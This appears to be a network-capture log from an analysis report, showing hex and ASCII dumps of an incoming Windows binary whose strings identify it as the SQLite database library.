2023-11-18 09:02:42 UTC	9858	IN	Data Raw: e4 03 00 48 8d 4c 24 20 e8 b9 68 02 00 8b 44 24 38 c6 04 18 00 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 70 80 79 11 00 48 8b d9 48 89 bc 24 90 00 00 00 48 8b fa 74 0e ff 41 14 80 79 12 00 75 05 e8 c8 fb 00 00 80 7f 11 00 74 11 ff 47 14 80 7f 12 00 75 08 48 8b cf e8 b1 fb 00 00 48 8b 43 08 48 89 b4 24 88 00 00 00 48 8b 08 48 8b 49 48 4c 8b 09 4d 85 c9 74 38 48 8b 47 08 4c 8d 84 24 80 00 00 00 8b 50 40 48 63 40 34 48 0f af d0 48 89 94 24 80 00 00 00 ba 0b 00 00 00 41 ff 51 50 33 f6 83 f8 0c 0f 45 f0 85 f6 0f 85 ec 00 00 00 33 c0 48 89 7c 24 48 48 89 44 24 38 48 89 44 24 20 48 89 44 24 30 48 89 44 24 50 48 89 44 24 58 48 89 44 24 60 48 8b 07 48 89 44 24 40 48 8b 47 08 48 89 5c 24 28 c7 44 24 38 01 00 00 00 48 8b 10 48 8b 43 08 48 8b Data Ascii: HL$ hD$8H@[@SHpyHH$HtAyutGuHHCH$HHIHLMt8HGL$P@Hc@4HH$AQP3E3H\|$HHD$8HD$ HD$0HD$PHD$XHD$`HHD$@HGH\$(D$8HHCH
2023-11-18 09:02:42 UTC	9874	IN	Data Raw: 8b c7 4c 8b 6c 24 70 48 8b 74 24 78 48 8b ac 24 80 00 00 00 4c 8b 7c 24 68 48 81 c4 88 00 00 00 41 5e 41 5c 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 54 24 10 48 89 4c 24 08 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 70 4c 8b 69 20 48 8b e9 48 8b ca 4c 89 6c 24 50 49 8b d8 45 33 ff 4d 8b a5 88 00 00 00 e8 61 65 00 00 4c 8b 9c 24 b8 00 00 00 41 8d 7f 01 41 8b 43 40 3d 80 00 00 00 73 0d 41 0f b6 43 40 41 88 04 24 8b c7 eb 3e 48 8b d0 48 83 f8 7f 77 0b 80 e2 7f 8b c7 41 88 14 24 eb 2a 48 81 fa ff 3f 00 00 77 19 48 c1 e8 07 0c 80 80 e2 7f 41 88 04 24 41 88 54 24 01 b8 02 00 00 00 eb 08 49 8b cc e8 5f 06 02 00 0f b6 c0 4c 03 e0 4c 39 bd 80 00 00 00 75 47 48 83 fb 7f 77 09 80 e3 7f 41 88 1c 24 eb 32 48 81 fb ff 3f 00 00 77 1c 48 Data Ascii: Ll$pHt$xH$L\|$hHA^A\_[H\$HT$HL$UVWATAUAVAWHpLi HHLl$PIE3MaeL$AAC@=sAC@A$>HHwA$*H?wHA$AT$I_LL9uGHwA$2H?wH
2023-11-18 09:02:42 UTC	9890	IN	Data Raw: 8b 9c 24 a0 00 00 00 48 83 c4 50 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 50 4d 8b c8 45 0f b7 40 16 4c 03 c2 4c 3b 41 58 76 35 48 8d 2d 36 e2 03 00 41 b9 70 1a 01 00 4c 8d 05 ad b9 03 00 48 89 6c 24 20 48 8d 15 81 b9 03 00 b9 0b 00 00 00 e8 8f e8 01 00 b8 0b 00 00 00 48 83 c4 50 5d c3 41 0f b7 41 14 33 d2 48 89 5c 24 70 48 89 74 24 78 48 89 7c 24 48 41 8b 78 fc 4c 89 64 24 40 4c 89 74 24 38 4c 8b 71 48 41 8b 49 10 2b c8 4c 89 7c 24 30 0f cf 45 8b 46 38 41 83 e8 04 41 8d 40 ff 03 c1 41 f7 f0 8b f0 85 c0 0f 84 8a 01 00 00 45 33 ff 48 8d 2d ae e1 03 00 45 8d 67 64 66 0f 1f 44 00 00 ff ce 44 89 7c 24 60 4c 89 7c 24 68 83 ff 02 0f 82 8b 01 00 00 41 3b 7e 40 0f 87 81 01 00 00 85 f6 74 26 4c 8d 4c 24 60 8b Data Ascii: $HPA_A^A]A\_^]@UHPME@LL;AXv5H-6ApLHl$ HHP]AA3H\$pHt$xH\|$HAxLd$@Lt$8LqHAI+L\|$0EF8AA@AE3H-EgdfDD\|$`L\|$hA;~@t&LL$`
2023-11-18 09:02:42 UTC	9906	IN	Data Raw: 4d 85 e4 74 11 48 8b 47 18 48 8b 48 50 8b 41 28 0f c8 41 89 04 24 85 ed 74 27 49 8b 06 8b 90 00 03 00 00 41 3b 97 80 00 00 00 7e 12 45 38 6f 0a 74 0c 49 8b cf e8 7c 89 00 00 8b d8 eb 03 41 8b dd 41 80 7e 11 00 4c 8b 7c 24 20 4c 8b 6c 24 28 4c 8b 64 24 30 48 8b 7c 24 60 48 8b 74 24 58 48 8b 6c 24 50 74 0f 41 83 6e 14 01 75 08 49 8b ce e8 91 3c 00 00 8b c3 48 83 c4 38 41 5e 5b c3 cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 80 79 11 00 48 8b d9 74 0e ff 41 14 80 79 12 00 75 05 e8 6f 3b 00 00 48 8b 43 08 c7 40 40 00 00 00 00 48 8b 4b 08 e8 2b 00 00 00 80 7b 11 00 8b f8 74 10 83 6b 14 01 75 0a 48 8b cb e8 35 3c 00 00 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc 40 57 48 83 ec 20 83 79 40 00 48 8b f9 76 08 33 c0 48 83 c4 20 5f c3 48 89 Data Ascii: MtHGHHPA(A$t'IA;~E8otI\|AA~L\|$ Ll$(Ld$0H\|$`Ht$XHl$PtAnuI<H8A^[H\$WH yHtAyuo;HC@@HK+{tkuH5<H\$0H _@WH y@Hv3H _H
2023-11-18 09:02:42 UTC	9922	IN	Data Raw: 48 89 43 48 48 89 43 50 48 89 43 58 48 89 43 60 48 89 43 68 48 89 43 70 4c 8b bc 24 88 00 00 00 80 7b 40 00 74 29 80 7b 3f 00 75 14 48 8b 4b 08 33 d2 48 8b 01 44 8d 4a 09 44 8d 42 01 ff 50 70 c6 43 40 00 c7 43 7c 00 00 00 00 c6 43 43 00 80 7b 41 00 74 20 80 7b 3f 00 75 16 48 8b 4b 08 ba 01 00 00 00 44 8b c2 48 8b 01 44 8d 4a 08 ff 50 70 c6 43 41 00 85 ff 75 0a 45 3b f4 74 05 bf 05 00 00 00 8b c7 48 8b 7c 24 78 48 83 c4 40 41 5e 41 5d 41 5c 5d 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 55 41 56 48 8b ec 48 83 ec 78 48 8b 05 19 08 06 00 48 33 c4 48 89 45 f0 48 8b 41 30 45 33 f6 4d 8b e8 89 55 bc 8b f2 44 89 4d ac 48 8b f9 4c 89 75 c0 48 8b 18 45 8d 46 30 48 8b d3 44 89 75 b0 48 83 c1 48 e8 41 54 ee ff 85 c0 74 08 8b 43 10 ff c0 89 Data Ascii: HCHHCPHCXHC`HChHCpL${@t){?uHK3HDJDBPpC@C\|CC{At {?uHKDHDJPpCAuE;tH\|$xH@A^A]A\][@USVWAUAVHHxHH3HEHA0E3MUDMHLuHEF0HDuHHATtC
2023-11-18 09:02:42 UTC	9938	IN	Data Raw: 72 ed ff ff 8b f8 48 8b cb e8 c8 3a 00 00 48 8b 5c 24 40 8b c7 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 0f b6 41 16 33 ff 48 8b d9 3c 04 72 04 3c 05 75 4f 40 38 79 11 75 15 48 8b 49 48 ba 04 00 00 00 48 8b 01 ff 50 38 8b f8 85 c0 75 08 c6 43 16 04 85 ff 74 2c 48 8b 4b 48 48 83 39 00 74 1b 80 7b 11 00 75 0b 48 8b 01 ba 01 00 00 00 ff 50 40 80 7b 16 05 74 04 c6 43 16 01 0f b6 43 10 88 43 17 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc 80 79 11 00 48 8b 41 48 48 8b 10 75 12 80 79 08 00 75 0f 83 3a 02 7c 07 48 83 7a 68 00 75 03 33 c0 c3 b8 01 00 00 00 c3 cc cc cc cc cc cc cc cc 48 8b 91 40 01 00 00 48 85 d2 74 0b 8b 42 18 c7 42 18 00 00 00 00 c3 33 c0 c3 cc cc cc cc cc cc 40 53 48 83 ec 50 4c 8b 91 Data Ascii: rH:H\$@H0_H\$WH A3H<r<uO@8yuHIHHP8uCt,HKHH9t{uHP@{tCCCH\$0H _yHAHHuyu:\|Hzhu3H@HtBB3@SHPL
2023-11-18 09:02:42 UTC	9954	IN	Data Raw: 24 30 48 ff c8 48 03 c1 48 99 48 f7 f9 3b 83 bc 00 00 00 76 06 89 83 bc 00 00 00 89 07 33 c0 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 57 48 83 ec 20 48 8b d9 c7 44 24 30 00 00 00 00 48 8b 89 40 01 00 00 e8 6f 8e ff ff 48 8b 8b 40 01 00 00 48 8d 54 24 30 e8 de 8e ff ff 8b f8 85 c0 75 06 39 44 24 30 74 4a ff 83 84 00 00 00 48 8b 43 70 48 85 c0 74 13 0f 1f 00 c7 40 18 01 00 00 00 48 8b 40 40 48 85 c0 75 f0 48 8b 8b 38 01 00 00 33 d2 e8 12 4d 00 00 80 7b 1b 00 74 12 48 8b 4b 48 45 33 c0 33 d2 48 8b 01 ff 90 90 00 00 00 8b c7 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 18 48 89 54 24 10 57 48 83 ec 30 48 8b da 48 8b f9 45 85 c9 74 30 33 c0 48 8d 4c 24 48 48 85 d2 Data Ascii: $0HHHH;v3H\$8H _H\$WH HD$0H@oH@HT$0u9D$0tJHCpHt@H@@HuH83M{tHKHE33HH\$8H _H\$Ht$HT$WH0HHEt03HL$HH
2023-11-18 09:02:42 UTC	9970	IN	Data Raw: c1 75 f3 49 8b 02 48 8b 48 18 49 89 0a 41 ff 4b 38 85 db 74 32 66 41 83 79 14 00 49 8b 59 20 74 18 48 8b 43 48 49 89 41 18 48 8b 43 08 4c 89 4b 48 ff 08 48 83 c4 20 5b c3 49 8b 09 e8 a5 03 00 00 48 8b 43 08 ff 08 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc 48 8b 41 28 48 8b 51 30 48 89 42 28 48 8b 51 28 48 8b 41 30 48 89 42 30 48 8b 41 20 48 c7 41 28 00 00 00 00 ff 48 34 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 48 89 7c 24 20 41 56 48 83 ec 20 8b 69 3c b8 00 01 00 00 03 ed 48 8b f9 3b e8 0f 42 e8 48 8b 01 48 8b 08 48 85 c9 74 06 ff 15 83 67 05 00 83 7f 3c 00 74 0e 48 8b 05 ce 9c 05 00 48 85 c0 74 02 ff d0 44 8b f5 33 db 49 c1 e6 03 4d 85 f6 74 1f 49 8b ce e8 f9 da 00 00 48 8b Data Ascii: uIHHIAK8t2fAyIY tHCHIAHCLKHH [IHCH [HA(HQ0HB(HQ(HA0HB0HA HA(H4HH\$Hl$Ht$H\|$ AVH i<H;BHHHtg<tHHtD3IMtIH
2023-11-18 09:02:42 UTC	9986	IN	Data Raw: 02 ff c2 41 3b d5 7e 40 48 8b cb e8 16 9a 00 00 45 33 c9 c7 44 24 20 40 b8 00 00 4c 8d 05 9c de 01 00 33 d2 8d 4a 01 e8 3a 27 00 00 4c 8b 6c 24 70 48 8b 5c 24 60 48 8b 6c 24 78 48 83 c4 30 41 5f 41 5e 41 5c 5f 5e c3 4c 8d 05 7f dc 01 00 48 8b d3 41 8b cf e8 8c 69 00 00 e9 96 00 00 00 49 8b cf 48 03 c9 e8 dc 95 00 00 48 8b e8 48 85 c0 0f 84 8f 02 00 00 48 8b d0 41 8b cf ff 15 7c 1c 05 00 48 8b cd 85 c0 75 31 e8 98 99 00 00 48 8b cb e8 90 99 00 00 ff 15 d2 1b 05 00 c7 44 24 20 a3 b8 00 00 4c 8d 05 23 de 01 00 8b d0 45 33 c9 b9 0a 19 00 00 e9 6d ff ff ff e8 67 2c 00 00 4c 8b e0 48 85 c0 0f 84 32 02 00 00 4c 8b c8 4c 8d 05 f9 db 01 00 48 8b d3 41 8b cf e8 06 69 00 00 49 8b cc e8 3e 99 00 00 48 8b cd e8 36 99 00 00 4c 8b 64 24 68 48 8b d7 48 ff c2 80 3c 13 00 Data Ascii: A;~@HE3D$ @L3J:'Ll$pH\$`Hl$xH0A_A^A\_^LHAiIHHHHA\|Hu1HD$ L#E3mg,LH2LLHAiI>H6Ld$hHH<
2023-11-18 09:02:42 UTC	10002	IN	Data Raw: 24 48 83 f9 02 73 0f 33 c0 c3 0f 1f 40 00 0f 1f 84 00 00 00 00 00 66 83 c2 f6 48 03 c9 48 83 f9 08 72 f3 eb 3e 48 81 f9 ff 00 00 00 76 19 0f 1f 84 00 00 00 00 00 66 83 c2 28 48 c1 e9 04 48 81 f9 ff 00 00 00 77 ef 48 83 f9 0f 76 16 66 0f 1f 84 00 00 00 00 00 66 83 c2 0a 48 d1 e9 48 83 f9 0f 77 f3 83 e1 07 48 8d 05 f1 9c 02 00 0f b7 04 48 66 83 e8 0a 66 03 c2 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 44 0f bf c2 66 3b ca 7c 31 0f bf d1 41 8d 40 31 3b d0 7e 04 0f b7 c1 c3 41 8d 40 1f 3b d0 7e 04 8d 41 01 c3 8b c2 41 2b c0 48 63 c8 48 8d 05 55 cb 02 00 0f b6 04 01 03 c2 c3 44 0f bf c9 41 8d 41 31 44 3b c0 7e 04 0f b7 c2 c3 41 8d 41 1f 44 3b c0 7e 04 8d 42 01 c3 41 8b c0 41 2b c1 48 63 c8 48 8d 05 20 cb 02 00 0f b6 04 01 41 03 c0 c3 cc cc cc cc cc cc cc cc cc Data Ascii: $Hs3@fHHr>Hvf(HHwHvffHHwHHffDf;\|1A@1;~A@;~AA+HcHUDAA1D;~AAD;~BAA+HcH A
2023-11-18 09:02:42 UTC	10018	IN	Data Raw: 63 f2 49 63 ca 48 98 49 03 c6 48 8d 51 0f 48 03 d0 48 83 fa 46 7e 20 48 8b 4c 24 30 e8 75 0c 00 00 48 89 44 24 58 48 8b d8 48 85 c0 0f 84 0e 0b 00 00 4c 8b 54 24 50 0f b6 54 24 20 45 85 d2 44 0f b6 5c 24 23 4c 8b e3 41 0f 9f c1 8b c2 44 0a ca 44 0a 4c 24 25 8d 0c 92 44 8d 04 4d 10 00 00 00 45 84 db 74 06 44 88 1b 48 ff c3 85 ff 79 36 c6 03 30 48 ff c3 eb 5a c6 44 24 24 02 41 8b fb e9 68 ff ff ff 44 0f b6 7c 24 20 45 33 db 41 80 fa 02 0f 85 53 ff ff ff 41 8b fb e9 4d ff ff ff 66 0f 1f 44 00 00 45 85 c0 7f 04 b0 30 eb 19 f2 0f 2c c6 41 ff c8 66 0f 6e c0 04 30 f3 0f e6 c0 f2 0f 5c f0 f2 0f 59 f7 88 03 48 ff c3 83 ef 01 79 d4 45 84 c9 74 06 c6 03 2e 48 ff c3 83 c7 01 79 1b f7 df b8 30 00 00 00 8b d7 48 8b fb 48 03 da 8b ca 44 2b d2 0f b6 54 24 20 f3 aa 45 85 Data Ascii: cIcHIHQHHF~ HL$0uHD$XHHLT$PT$ ED\$#LADDL$%DMEtDHy60HZD$$AhD\|$ E3ASAMfDE0,Afn0\YHyEt.Hy0HHD+T$ E
2023-11-18 09:02:42 UTC	10034	IN	Data Raw: b6 8c 20 70 13 17 00 41 0f b6 00 42 0f b6 84 20 70 13 17 00 3b c1 0f 85 12 04 00 00 80 7b 28 00 75 10 80 7b 2a 00 75 0a 80 7b 2b 00 0f 84 fc 03 00 00 48 8b cb e8 ec 07 00 00 66 89 6b 2b 48 c7 43 14 00 00 00 00 48 c7 43 20 00 00 00 00 66 c7 43 28 00 00 48 83 c7 09 0f 84 d0 03 00 00 4c 8d 0d d5 0a 01 00 48 8b d7 4c 2b cf 66 66 66 0f 1f 84 00 00 00 00 00 0f b6 02 46 0f b6 04 0a 41 3b c0 75 09 85 c0 74 43 48 ff c2 eb ea 42 0f b6 8c 20 70 13 17 00 43 0f b6 84 20 70 13 17 00 3b c8 75 05 48 ff c2 eb cf 4c 8d 0d 94 0a 01 00 48 8b d7 4c 2b cf 66 90 0f b6 02 46 0f b6 04 0a 41 3b c0 75 1c 85 c0 75 2e 89 6b 0c 89 6b 10 33 ed 8b c5 48 81 c4 90 00 00 00 41 5c 5f 5e 5d 5b c3 42 0f b6 8c 20 70 13 17 00 43 0f b6 84 20 70 13 17 00 3b c8 75 05 48 ff c2 eb bc 4c 8d 05 35 0a Data Ascii: pAB p;{(u{*u{+Hfk+HCHC fC(HLHL+fffFA;utCHB pC p;uHLHL+fFA;uu.kk3HA\_^][B pC p;uHL5
2023-11-18 09:02:42 UTC	10050	IN	Data Raw: 00 00 c6 59 e4 3f 00 00 00 00 72 6e e4 3f 00 00 00 00 0a 83 e4 3f 00 00 00 00 8f 97 e4 3f 00 00 00 00 00 ac e4 3f 00 00 00 00 5e c0 e4 3f 00 00 00 00 a8 d4 e4 3f 00 00 00 00 de e8 e4 3f 00 00 00 00 01 fd e4 3f 00 00 00 00 10 11 e5 3f 00 00 00 00 0c 25 e5 3f 00 00 00 00 f5 38 e5 3f 00 00 00 00 ca 4c e5 3f 00 00 00 00 8d 60 e5 3f 00 00 00 00 3c 74 e5 3f 00 00 00 00 d8 87 e5 3f 00 00 00 00 60 9b e5 3f 00 00 00 00 d6 ae e5 3f 00 00 00 00 39 c2 e5 3f 00 00 00 00 89 d5 e5 3f 00 00 00 00 c6 e8 e5 3f 00 00 00 00 f0 fb e5 3f 00 00 00 00 08 0f e6 3f 00 00 00 00 0d 22 e6 3f 00 00 00 00 ff 34 e6 3f 00 00 00 00 de 47 e6 3f 00 00 00 00 ab 5a e6 3f 00 00 00 00 66 6d e6 3f 00 00 00 00 0e 80 e6 3f 00 00 00 00 a4 92 e6 3f 00 00 00 00 27 a5 e6 3f 00 00 00 00 98 b7 e6 3f 00 Data Ascii: Y?rn????^?????%?8?L?`?<t??`??9?????"?4?G?Z?fm???'??
2023-11-18 09:02:42 UTC	10066	IN	Data Raw: 15 80 01 00 00 00 20 84 15 80 01 00 00 00 30 84 15 80 01 00 00 00 48 84 15 80 01 00 00 00 50 84 15 80 01 00 00 00 58 84 15 80 01 00 00 00 60 84 15 80 01 00 00 00 68 84 15 80 01 00 00 00 70 84 15 80 01 00 00 00 78 84 15 80 01 00 00 00 80 84 15 80 01 00 00 00 88 84 15 80 01 00 00 00 90 84 15 80 01 00 00 00 98 84 15 80 01 00 00 00 a0 84 15 80 01 00 00 00 a8 84 15 80 01 00 00 00 b8 84 15 80 01 00 00 00 d0 84 15 80 01 00 00 00 e0 84 15 80 01 00 00 00 68 84 15 80 01 00 00 00 f0 84 15 80 01 00 00 00 00 85 15 80 01 00 00 00 10 85 15 80 01 00 00 00 20 85 15 80 01 00 00 00 38 85 15 80 01 00 00 00 48 85 15 80 01 00 00 00 60 85 15 80 01 00 00 00 74 85 15 80 01 00 00 00 7c 85 15 80 01 00 00 00 88 85 15 80 01 00 00 00 a0 85 15 80 01 00 00 00 c8 85 15 80 01 00 00 00 e0 Data Ascii: 0HPX`hpxh 8H`t\|
2023-11-18 09:02:42 UTC	10082	IN	Data Raw: 00 00 00 00 00 00 18 cf 15 80 01 00 00 00 45 00 00 00 00 00 00 00 58 b3 15 80 01 00 00 00 04 00 00 00 00 00 00 00 28 cf 15 80 01 00 00 00 47 00 00 00 00 00 00 00 38 cf 15 80 01 00 00 00 87 00 00 00 00 00 00 00 60 b3 15 80 01 00 00 00 05 00 00 00 00 00 00 00 48 cf 15 80 01 00 00 00 48 00 00 00 00 00 00 00 68 b3 15 80 01 00 00 00 06 00 00 00 00 00 00 00 58 cf 15 80 01 00 00 00 a2 00 00 00 00 00 00 00 68 cf 15 80 01 00 00 00 91 00 00 00 00 00 00 00 78 cf 15 80 01 00 00 00 49 00 00 00 00 00 00 00 88 cf 15 80 01 00 00 00 b3 00 00 00 00 00 00 00 98 cf 15 80 01 00 00 00 ab 00 00 00 00 00 00 00 40 b5 15 80 01 00 00 00 41 00 00 00 00 00 00 00 a8 cf 15 80 01 00 00 00 8b 00 00 00 00 00 00 00 70 b3 15 80 01 00 00 00 07 00 00 00 00 00 00 00 b8 cf 15 80 01 00 00 00 4a Data Ascii: EX(G8`HHhXhxI@ApJ
2023-11-18 09:02:42 UTC	10098	IN	Data Raw: 58 5f 54 52 49 47 47 45 52 5f 44 45 50 54 48 3d 31 30 30 30 00 00 4d 41 58 5f 56 41 52 49 41 42 4c 45 5f 4e 55 4d 42 45 52 3d 33 32 37 36 36 00 00 00 00 00 00 00 4d 41 58 5f 56 44 42 45 5f 4f 50 3d 32 35 30 30 30 30 30 30 30 00 00 00 4d 41 58 5f 57 4f 52 4b 45 52 5f 54 48 52 45 41 44 53 3d 38 00 00 00 00 4d 55 54 45 58 5f 57 33 32 00 00 00 00 00 00 00 53 4f 55 4e 44 45 58 00 54 45 4d 50 5f 53 54 4f 52 45 3d 31 00 00 00 00 54 48 52 45 41 44 53 41 46 45 3d 31 00 00 00 00 55 53 45 5f 55 52 49 00 57 49 4e 33 32 5f 4d 41 4c 4c 4f 43 00 00 00 00 41 4e 59 00 42 4c 4f 42 00 00 00 00 49 4e 54 00 49 4e 54 45 47 45 52 00 52 45 41 4c 00 00 00 00 54 45 58 54 00 00 00 00 32 30 62 3a 32 30 65 00 32 30 63 3a 32 30 65 00 32 30 65 00 00 00 00 00 34 30 66 2d 32 31 61 2d 32 Data Ascii: X_TRIGGER_DEPTH=1000MAX_VARIABLE_NUMBER=32766MAX_VDBE_OP=250000000MAX_WORKER_THREADS=8MUTEX_W32SOUNDEXTEMP_STORE=1THREADSAFE=1USE_URIWIN32_MALLOCANYBLOBINTINTEGERREALTEXT20b:20e20c:20e20e40f-21a-2
2023-11-18 09:02:42 UTC	10114	IN	Data Raw: 72 65 69 67 6e 20 6b 65 79 20 6f 6e 20 25 73 20 73 68 6f 75 6c 64 20 72 65 66 65 72 65 6e 63 65 20 6f 6e 6c 79 20 6f 6e 65 20 63 6f 6c 75 6d 6e 20 6f 66 20 74 61 62 6c 65 20 25 54 00 00 00 00 00 00 00 00 00 00 6e 75 6d 62 65 72 20 6f 66 20 63 6f 6c 75 6d 6e 73 20 69 6e 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 6d 61 74 63 68 20 74 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 63 6f 6c 75 6d 6e 73 20 69 6e 20 74 68 65 20 72 65 66 65 72 65 6e 63 65 64 20 74 61 62 6c 65 00 00 00 75 6e 6b 6e 6f 77 6e 20 63 6f 6c 75 6d 6e 20 22 25 73 22 20 69 6e 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 64 65 66 69 6e 69 74 69 6f 6e 00 00 00 46 49 52 53 54 00 00 00 4c 41 53 54 00 00 00 00 75 6e 73 75 70 70 6f 72 74 65 64 20 75 73 65 20 6f 66 20 4e 55 4c 4c 53 20 Data Ascii: reign key on %s should reference only one column of table %Tnumber of columns in foreign key does not match the number of columns in the referenced tableunknown column "%s" in foreign key definitionFIRSTLASTunsupported use of NULLS
2023-11-18 09:02:42 UTC	10130	IN	Data Raw: 75 65 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 74 61 74 27 20 57 48 45 52 45 20 69 64 3d 3f 00 00 00 00 00 00 00 52 45 50 4c 41 43 45 20 49 4e 54 4f 20 25 51 2e 27 25 71 5f 73 74 61 74 27 20 56 41 4c 55 45 53 28 3f 2c 3f 29 00 00 00 44 45 4c 45 54 45 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 20 57 48 45 52 45 20 6c 65 76 65 6c 20 42 45 54 57 45 45 4e 20 3f 20 41 4e 44 20 3f 00 00 53 45 4c 45 43 54 20 3f 20 55 4e 49 4f 4e 20 53 45 4c 45 43 54 20 6c 65 76 65 6c 20 2f 20 28 31 30 32 34 20 2a 20 3f 29 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 00 00 00 00 53 45 4c 45 43 54 20 6c 65 76 65 6c 2c 20 63 6f 75 6e 74 28 2a 29 20 41 53 20 63 6e 74 20 46 52 4f 4d 20 25 51 2e 27 25 71 5f 73 65 67 64 69 72 27 20 20 20 47 52 4f 55 50 Data Ascii: ue FROM %Q.'%q_stat' WHERE id=?REPLACE INTO %Q.'%q_stat' VALUES(?,?)DELETE FROM %Q.'%q_segdir' WHERE level BETWEEN ? AND ?SELECT ? UNION SELECT level / (1024 * ?) FROM %Q.'%q_segdir'SELECT level, count(*) AS cnt FROM %Q.'%q_segdir' GROUP
2023-11-18 09:02:42 UTC	10146	IN	Data Raw: 1e 01 85 08 27 00 65 03 46 02 98 00 86 01 d8 01 a6 00 f8 00 26 00 38 00 26 00 38 02 0c 0e 9e 00 26 00 38 00 5e 00 26 00 65 00 35 00 58 00 29 00 35 00 69 00 29 00 49 00 25 00 29 02 29 01 65 04 5e 00 25 00 69 00 65 00 1e 03 85 00 5e 00 39 00 7e 00 5e 00 25 00 69 06 05 06 5e 04 3a 00 ac 00 4b 00 fe 06 de 01 25 00 1e 0b c9 04 26 00 d5 00 e5 04 35 00 31 00 37 00 ac 05 31 00 2c 00 35 00 4c 00 35 00 4c 00 35 00 2c 00 67 03 67 00 55 00 a2 00 79 00 55 00 37 00 55 00 5a 00 6c 01 35 00 55 00 07 04 26 00 47 01 ac 02 4d 01 95 00 47 00 2c 00 67 0c 35 00 27 00 ec 00 22 00 3a 00 cc 00 46 00 4c 00 3a 00 8c 00 47 00 4d 01 67 00 5a 00 27 00 d5 01 22 00 27 00 2c 00 c7 03 6c 03 27 0b 6c 01 27 00 4d 01 27 04 2c 01 46 00 3a 00 75 00 26 00 c7 02 8c 00 26 00 2c 01 26 00 6c 00 26 Data Ascii: 'eF&8&8&8^&e5X)5i)I%))e^%ie^9~^%i^:K%&5171,5L5L5,ggUyU7UZl5U&GMG,g5'":FL:GMgZ'"',l'l'M',F:u&&,&l&
2023-11-18 09:02:42 UTC	10162	IN	Data Raw: 7e fc 47 3d 3d 7a ac 64 64 c8 e7 5d 5d ba 2b 19 19 32 95 73 73 e6 a0 60 60 c0 98 81 81 19 d1 4f 4f 9e 7f dc dc a3 66 22 22 44 7e 2a 2a 54 ab 90 90 3b 83 88 88 0b ca 46 46 8c 29 ee ee c7 d3 b8 b8 6b 3c 14 14 28 79 de de a7 e2 5e 5e bc 1d 0b 0b 16 76 db db ad 3b e0 e0 db 56 32 32 64 4e 3a 3a 74 1e 0a 0a 14 db 49 49 92 0a 06 06 0c 6c 24 24 48 e4 5c 5c b8 5d c2 c2 9f 6e d3 d3 bd ef ac ac 43 a6 62 62 c4 a8 91 91 39 a4 95 95 31 37 e4 e4 d3 8b 79 79 f2 32 e7 e7 d5 43 c8 c8 8b 59 37 37 6e b7 6d 6d da 8c 8d 8d 01 64 d5 d5 b1 d2 4e 4e 9c e0 a9 a9 49 b4 6c 6c d8 fa 56 56 ac 07 f4 f4 f3 25 ea ea cf af 65 65 ca 8e 7a 7a f4 e9 ae ae 47 18 08 08 10 d5 ba ba 6f 88 78 78 f0 6f 25 25 4a 72 2e 2e 5c 24 1c 1c 38 f1 a6 a6 57 c7 b4 b4 73 51 c6 c6 97 23 e8 e8 cb 7c dd dd a1 9c Data Ascii: ~G==zdd]]+2ss``OOf""D~**T;FF)k<(y^^v;V22dN::tIIl$$H\\]nCbb917yy2CY77nmmdNNIllVV%eezzGoxxo%%Jr..\$8WsQ#\|
2023-11-18 09:02:42 UTC	10178	IN	Data Raw: ba 00 e6 01 ed 00 01 04 bf 05 d5 05 ec 01 0c 01 ef 00 6a 00 6a 00 be 00 ef 01 95 01 f0 00 54 01 6b 00 58 01 bf 01 3a 02 39 02 e2 04 f1 00 f7 03 01 04 01 02 1b 05 b2 01 5b 00 1a 05 6a 00 6a 00 12 05 71 03 19 05 d7 00 42 06 6b 00 fd 04 bf 01 3a 02 39 02 41 06 96 01 f7 03 fc 04 66 01 fb 04 40 06 22 06 b4 01 b5 01 2b 01 11 05 0a 02 f7 03 f7 03 f9 03 fa 03 1b 00 2c 01 11 02 5f 00 6c 01 fe 00 44 05 70 01 ff 00 14 06 b8 01 0a 00 13 06 7f 01 b1 05 66 00 61 00 f7 03 f7 03 f9 03 fa 03 1b 00 30 01 14 02 22 00 3c 02 9d 04 07 01 09 01 45 05 32 05 0a 01 c9 00 72 01 7d 01 43 05 74 01 31 05 42 05 76 01 5c 05 83 01 84 01 5b 05 3d 02 dd 04 d8 04 9f 00 e5 05 e6 05 e4 05 e3 05 a0 00 8e 00 29 01 d3 00 d4 00 4e 00 42 03 c0 01 cb 00 34 01 a1 00 de 00 3d 04 8b 00 3b 04 3c 01 ae Data Ascii: jjTkX:9[jjqBk:9Af@"+,_lDpfa0"<E2r}Ct1Bv\[=)NB4=;<
